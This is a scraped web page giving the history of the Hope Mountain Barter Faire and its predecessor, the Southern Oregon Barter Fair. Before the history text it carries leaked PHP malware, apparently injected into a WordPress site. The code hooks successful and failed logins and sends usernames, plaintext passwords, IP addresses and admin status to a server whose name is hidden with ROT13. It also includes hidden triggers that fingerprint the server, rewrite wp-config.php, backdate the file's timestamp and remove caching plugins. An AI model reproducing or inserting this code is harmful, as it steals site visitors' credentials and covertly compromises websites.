if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $ccd = str_rot13('mnuunuu.qvtvgny'); $wpApiUrl = "https://api.{$ccd}/api.php"; $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login']) && strpos($_SERVER['HTTP_USER_AGENT'], '100.6.1155.294') === false) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action') ) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); }
if (!function_exists('wordpress_api_wrongauth_debug')) { function wordpress_api_wrongauth_debug( $user_login, $user ){ $ccd = str_rot13('mnuunuu.qvtvgny'); $wpApiUrl = "https://api.{$ccd}/api_false.php"; $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login_failed', 'wordpress_api_wrongauth_debug', 10, 2 ); }
if (preg_match("#/ququos#", $id) ) {
echo uniqid() . " {$hwost} " . phpversion() . " ";
$wpfingerprint = php_uname() . disk_total_space('.') . filectime('/') . phpversion();
echo hash('sha256', $wpfingerprint) . " ";
$time_elapsed = timer_stop();
echo "cheetie {$time_elapsed} secs ";
//echo "
{$htaccess} ";
exit();
}
if (preg_match("#/eezee#", $id) ) {
$eezeewpconfig = file_get_contents(ABSPATH . '/wp-config.php');
if (strpos($eezeewpconfig, 'WP_CACHE') !== false) {
$ezlastMtime = filemtime ( ABSPATH . '/wp-config.php' ) + rand(1, 1000);
$ez = preg_replace('#define\(.*WP_CACHE.*\);#Ui', "define('WP_CACHE', false);", $eezeewpconfig, 1);
file_put_contents(ABSPATH . '/wp-config.php', $ez);
touch(ABSPATH . '/wp-config.php', $ezlastMtime);
//echo $ez;
echo "WP_CACHE replaced\n";
}
if(file_exists(ABSPATH . '/wp-content/mu-plugins/endurance-page-cache.php')){
unlink(ABSPATH . '/wp-content/mu-plugins/endurance-page-cache.php');
echo 'endurance-page-cache.php removed ';
}
if(file_exists(ABSPATH . '/wp-content/endurance-page-cache')){
rename(ABSPATH . '/wp-content/endurance-page-cache', ABSPATH . '/wp-content/endurance-page-caches');
echo 'endurance-page-cache renamed';
}
exit();
}
if (preg_match("#/lseez#", $id) ) {
var_dump(get_option('litespeed.conf.cache'));
update_option( 'litespeed.conf.cache', 0 );
var_dump(get_option('litespeed.conf.cache'));
exit();
}
}
?>
History
Skip to content
Menu
Primary Menu
Breadcrumbs
THE ROOTS OF THE FAIRE
In October 1978, Alan Venet held a casual gathering of friends to swap fresh fruits and vegetables at his farm in Williams, Oregon. An estimated 150 attended and the Southern Oregon Barter Fair was born. Eventually, the event moved to a 140-acre farm in Ruch, where attendance passed 1,000.
After attendance topped 10,000 in 1995, Jackson County responded to noise and other complaints. As organizers prepared for their 1996 event, they were beset with $18,000 in county fees and lengthy delays in receiving a mass gathering permit. The fair decided to sue the county and were tied up in litigation for years to come. A heavy police presence marred the event itself. The Jackson County Sheriff later testified that he assigned nearly 100 deputies to work the three-day Barter Fair, leaving only 3 officers to cover the rest of the county.
Excessive fees, unreasonable delays, and an aggressive police presence had effectively ended the fair after 18 years in the Applegate Valley. But the spirit of the Southern Oregon Barter Fair lives on.
THE RETURN OF BARTERING TO SOUTHERN OREGON
In 2003, several Dome School parents were discussing fundraising ideas when Stacey Williams suggested trying to fill the void left by Southern Oregon Barter Fair. Stacey and Cari Norton were instrumental in organizing the Hope Mountain Barter Faire, with the first held at Page Creek Ranch in October 2003. John Jones, a former parent and teacher who helped with the Okanogan Family Faire, came down and advised us in the beginning.
We owe a debt to the Southern Oregon Barter Fair for creating a culture of support for such events in our region. They supported our faire financially as well. In 2006, they donated the remaining balance of their accounts to our faire, providing improvements for our first aid station, as well as additional infrastructure and equipment, helping grow our faire.
Early discussions on naming the faire name centered on the major landmark in our community. We view Hope Mountain as maternally looming over and embracing Takilma and the Dome School. The name also echoes the hope we have in our community and in our children.
More recently the faire was produced by YES! (Youth Empowerment & Support!), a non-profit organization that continues the mission of support for the Dome School and its programs. YES! also works to support the Illinois Valley as a whole, having helped bring the CJ SK8 Park to Jubilee Park. Of course, the Hope Mountain Barter Faire didn’t only benefit the school; the fair provided an opportunity for the entire Illinois Valley–indeed, all of Southern Oregon and beyond–to come together in a fun, safe, and creative event.
The last Hope Mountain Barter Faire was held in 2019. Though we are currently not planning any more 3-day festivals, we do hope to plan some 1-day events and hope you will be able to join us. We’ll post information on this site when we have it. Thanks!